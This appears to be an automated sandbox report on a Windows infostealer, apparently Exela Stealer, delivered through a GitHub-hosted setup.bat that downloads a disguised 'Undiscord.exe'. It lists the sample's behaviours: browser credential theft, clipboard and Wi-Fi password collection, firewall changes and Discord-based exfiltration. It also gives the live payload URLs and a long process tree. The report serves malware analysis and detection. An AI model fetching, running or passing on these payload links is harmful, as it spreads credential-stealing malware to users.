Analysis
-
max time kernel
164s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
30-07-2024 14:56
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://raw.githubusercontent.com/lunastealer/Dawa-Stealer/main/setup.bat
Resource
win10v2004-20240709-en
General
-
Target
https://raw.githubusercontent.com/lunastealer/Dawa-Stealer/main/setup.bat
Malware Config
Extracted
https://github.com/lunastealer/Discord-Message-Deletor/releases/download/vypix/Undiscord.exe
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 58 1448 powershell.exe 60 1448 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 5164 netsh.exe 4392 netsh.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3800 cmd.exe 4644 powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 5960 Undiscord.exe 6016 Undiscord.exe 2312 Undiscord.exe 1520 Undiscord.exe -
Loads dropped DLL 62 IoCs
pid Process 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 6016 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 1520 Undiscord.exe 6016 Undiscord.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000023585-199.dat upx behavioral1/memory/6016-203-0x00007FFC48710000-0x00007FFC48B7E000-memory.dmp upx behavioral1/files/0x0009000000023437-205.dat upx behavioral1/files/0x000700000002357f-211.dat upx behavioral1/memory/6016-213-0x00007FFC617E0000-0x00007FFC617EF000-memory.dmp upx behavioral1/memory/6016-212-0x00007FFC616E0000-0x00007FFC61704000-memory.dmp upx behavioral1/files/0x000700000002357e-214.dat upx behavioral1/files/0x0007000000023580-215.dat upx behavioral1/files/0x0007000000023583-216.dat upx behavioral1/files/0x0007000000023586-217.dat upx behavioral1/files/0x0007000000023587-218.dat upx behavioral1/files/0x0007000000023588-219.dat upx behavioral1/files/0x0009000000023431-220.dat upx behavioral1/files/0x0009000000023433-221.dat upx behavioral1/files/0x0009000000023436-222.dat upx behavioral1/files/0x000900000002343a-223.dat upx behavioral1/files/0x000900000002343c-224.dat upx behavioral1/files/0x000b000000023537-225.dat upx behavioral1/files/0x0009000000023549-226.dat upx behavioral1/files/0x000c000000023550-227.dat upx behavioral1/files/0x0009000000023556-228.dat upx behavioral1/files/0x0009000000023559-229.dat upx behavioral1/files/0x000800000002355c-230.dat upx behavioral1/files/0x000700000002355f-231.dat upx behavioral1/files/0x0007000000023560-232.dat upx behavioral1/memory/6016-234-0x00007FFC616C0000-0x00007FFC616D9000-memory.dmp upx behavioral1/memory/6016-236-0x00007FFC616B0000-0x00007FFC616BD000-memory.dmp upx behavioral1/memory/6016-238-0x00007FFC60200000-0x00007FFC60219000-memory.dmp upx behavioral1/memory/6016-241-0x00007FFC5A400000-0x00007FFC5A42D000-memory.dmp upx behavioral1/memory/6016-242-0x00007FFC5E510000-0x00007FFC5E52F000-memory.dmp upx behavioral1/memory/6016-244-0x00007FFC48000000-0x00007FFC48169000-memory.dmp upx behavioral1/memory/6016-253-0x00007FFC48710000-0x00007FFC48B7E000-memory.dmp upx behavioral1/memory/6016-252-0x00007FFC48D70000-0x00007FFC48E27000-memory.dmp upx behavioral1/memory/6016-251-0x00007FFC45B90000-0x00007FFC45F07000-memory.dmp upx behavioral1/memory/6016-249-0x00007FFC59D50000-0x00007FFC59D7E000-memory.dmp upx behavioral1/memory/6016-255-0x00007FFC5A540000-0x00007FFC5A555000-memory.dmp upx behavioral1/memory/6016-257-0x00007FFC616E0000-0x00007FFC61704000-memory.dmp upx behavioral1/files/0x0007000000023582-259.dat upx behavioral1/memory/6016-258-0x00007FFC616A0000-0x00007FFC616B0000-memory.dmp upx behavioral1/memory/6016-262-0x00007FFC59D10000-0x00007FFC59D24000-memory.dmp upx behavioral1/memory/6016-261-0x00007FFC616C0000-0x00007FFC616D9000-memory.dmp upx behavioral1/memory/6016-265-0x00007FFC59BC0000-0x00007FFC59BD4000-memory.dmp upx behavioral1/memory/6016-264-0x00007FFC616B0000-0x00007FFC616BD000-memory.dmp upx behavioral1/memory/6016-268-0x00007FFC45A70000-0x00007FFC45B88000-memory.dmp upx behavioral1/files/0x000700000002358a-267.dat upx behavioral1/memory/6016-270-0x00007FFC54810000-0x00007FFC54832000-memory.dmp upx behavioral1/memory/6016-272-0x00007FFC547F0000-0x00007FFC54807000-memory.dmp upx behavioral1/memory/6016-271-0x00007FFC5E510000-0x00007FFC5E52F000-memory.dmp upx behavioral1/memory/6016-273-0x00007FFC48000000-0x00007FFC48169000-memory.dmp upx behavioral1/memory/6016-276-0x00007FFC59D50000-0x00007FFC59D7E000-memory.dmp upx behavioral1/memory/6016-283-0x00007FFC5A540000-0x00007FFC5A555000-memory.dmp upx behavioral1/memory/6016-282-0x00007FFC546C0000-0x00007FFC546DE000-memory.dmp upx behavioral1/memory/6016-281-0x00007FFC601F0000-0x00007FFC601FA000-memory.dmp upx behavioral1/memory/6016-280-0x00007FFC48D70000-0x00007FFC48E27000-memory.dmp upx behavioral1/memory/6016-279-0x00007FFC546E0000-0x00007FFC546F1000-memory.dmp upx behavioral1/memory/6016-278-0x00007FFC45B90000-0x00007FFC45F07000-memory.dmp upx behavioral1/memory/6016-275-0x00007FFC54700000-0x00007FFC5474C000-memory.dmp upx behavioral1/memory/6016-274-0x00007FFC54750000-0x00007FFC54769000-memory.dmp upx behavioral1/memory/6016-284-0x000002A0F1CA0000-0x000002A0F2441000-memory.dmp upx behavioral1/memory/6016-285-0x000002A0F1CA0000-0x000002A0F2441000-memory.dmp upx behavioral1/memory/6016-286-0x00007FFC48D30000-0x00007FFC48D68000-memory.dmp upx behavioral1/memory/1520-347-0x00007FFC44E50000-0x00007FFC452BE000-memory.dmp upx behavioral1/memory/6016-352-0x00007FFC54810000-0x00007FFC54832000-memory.dmp upx behavioral1/memory/1520-351-0x00007FFC5AC60000-0x00007FFC5AC6F000-memory.dmp upx -
pid Process 1448 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 101 discord.com 103 discord.com 4 raw.githubusercontent.com 7 raw.githubusercontent.com 10 raw.githubusercontent.com 99 discord.com 100 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 96 ip-api.com -
pid Process 964 cmd.exe 4940 ARP.EXE -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 5716 tasklist.exe 2300 tasklist.exe 3884 tasklist.exe 4724 tasklist.exe 5820 tasklist.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2520 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023536-144.dat pyinstaller -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4180 cmd.exe 3552 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 644 NETSTAT.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 5296 WMIC.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5816 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 400 ipconfig.exe 644 NETSTAT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4896 systeminfo.exe -
Kills process with taskkill 8 IoCs
pid Process 4580 taskkill.exe 4972 taskkill.exe 644 taskkill.exe 2848 taskkill.exe 2568 taskkill.exe 3484 taskkill.exe 5172 taskkill.exe 440 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1616 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 3440 msedge.exe 3440 msedge.exe 2352 msedge.exe 2352 msedge.exe 3748 identity_helper.exe 3748 identity_helper.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 5692 msedge.exe 5692 msedge.exe 5692 msedge.exe 5692 msedge.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1448 powershell.exe Token: SeIncreaseQuotaPrivilege 5816 WMIC.exe Token: SeSecurityPrivilege 5816 WMIC.exe Token: SeTakeOwnershipPrivilege 5816 WMIC.exe Token: SeLoadDriverPrivilege 5816 WMIC.exe Token: SeSystemProfilePrivilege 5816 WMIC.exe Token: SeSystemtimePrivilege 5816 WMIC.exe Token: SeProfSingleProcessPrivilege 5816 WMIC.exe Token: SeIncBasePriorityPrivilege 5816 WMIC.exe Token: SeCreatePagefilePrivilege 5816 WMIC.exe Token: SeBackupPrivilege 5816 WMIC.exe Token: SeRestorePrivilege 5816 WMIC.exe Token: SeShutdownPrivilege 5816 WMIC.exe Token: SeDebugPrivilege 5816 WMIC.exe Token: SeSystemEnvironmentPrivilege 5816 WMIC.exe Token: SeRemoteShutdownPrivilege 5816 WMIC.exe Token: SeUndockPrivilege 5816 WMIC.exe Token: SeManageVolumePrivilege 5816 WMIC.exe Token: 33 5816 WMIC.exe Token: 34 5816 WMIC.exe Token: 35 5816 WMIC.exe Token: 36 5816 WMIC.exe Token: SeIncreaseQuotaPrivilege 1628 WMIC.exe Token: SeSecurityPrivilege 1628 WMIC.exe Token: SeTakeOwnershipPrivilege 1628 WMIC.exe Token: SeLoadDriverPrivilege 1628 WMIC.exe Token: SeSystemProfilePrivilege 1628 WMIC.exe Token: SeSystemtimePrivilege 1628 WMIC.exe Token: SeProfSingleProcessPrivilege 1628 WMIC.exe Token: SeIncBasePriorityPrivilege 1628 WMIC.exe Token: SeCreatePagefilePrivilege 1628 WMIC.exe Token: SeBackupPrivilege 1628 WMIC.exe Token: SeRestorePrivilege 1628 WMIC.exe Token: SeShutdownPrivilege 1628 WMIC.exe Token: SeDebugPrivilege 1628 WMIC.exe Token: SeSystemEnvironmentPrivilege 1628 WMIC.exe Token: SeRemoteShutdownPrivilege 1628 WMIC.exe Token: SeUndockPrivilege 1628 WMIC.exe Token: SeManageVolumePrivilege 1628 WMIC.exe Token: 33 1628 WMIC.exe Token: 34 1628 WMIC.exe Token: 35 1628 WMIC.exe Token: 36 1628 WMIC.exe Token: SeIncreaseQuotaPrivilege 5816 WMIC.exe Token: SeSecurityPrivilege 5816 WMIC.exe Token: SeTakeOwnershipPrivilege 5816 WMIC.exe Token: SeLoadDriverPrivilege 5816 WMIC.exe Token: SeSystemProfilePrivilege 5816 WMIC.exe Token: SeSystemtimePrivilege 5816 WMIC.exe Token: SeProfSingleProcessPrivilege 5816 WMIC.exe Token: SeIncBasePriorityPrivilege 5816 WMIC.exe Token: SeCreatePagefilePrivilege 5816 WMIC.exe Token: SeBackupPrivilege 5816 WMIC.exe Token: SeRestorePrivilege 5816 WMIC.exe Token: SeShutdownPrivilege 5816 WMIC.exe Token: SeDebugPrivilege 5816 WMIC.exe Token: SeSystemEnvironmentPrivilege 5816 WMIC.exe Token: SeRemoteShutdownPrivilege 5816 WMIC.exe Token: SeUndockPrivilege 5816 WMIC.exe Token: SeManageVolumePrivilege 5816 WMIC.exe Token: 33 5816 WMIC.exe Token: 34 5816 WMIC.exe Token: 35 5816 WMIC.exe Token: 36 5816 WMIC.exe -
Suspicious use of FindShellTrayWindow 59 IoCs
pid Process 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 1616 NOTEPAD.EXE 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe -
Suspicious use of SendNotifyMessage 57 IoCs
pid Process 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe 228 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2352 wrote to memory of 3788 2352 msedge.exe 84 PID 2352 wrote to memory of 3788 2352 msedge.exe 84 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 2020 2352 msedge.exe 85 PID 2352 wrote to memory of 3440 2352 msedge.exe 86 PID 2352 wrote to memory of 3440 2352 msedge.exe 86 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87 PID 2352 wrote to memory of 2120 2352 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/lunastealer/Dawa-Stealer/main/setup.bat1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc59aa46f8,0x7ffc59aa4708,0x7ffc59aa47182⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:22⤵PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:82⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:4696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:3384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:82⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵PID:4292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:12⤵PID:2324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:12⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:12⤵PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14900159984519468218,14494205590375307275,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5192 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5692
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5112
-
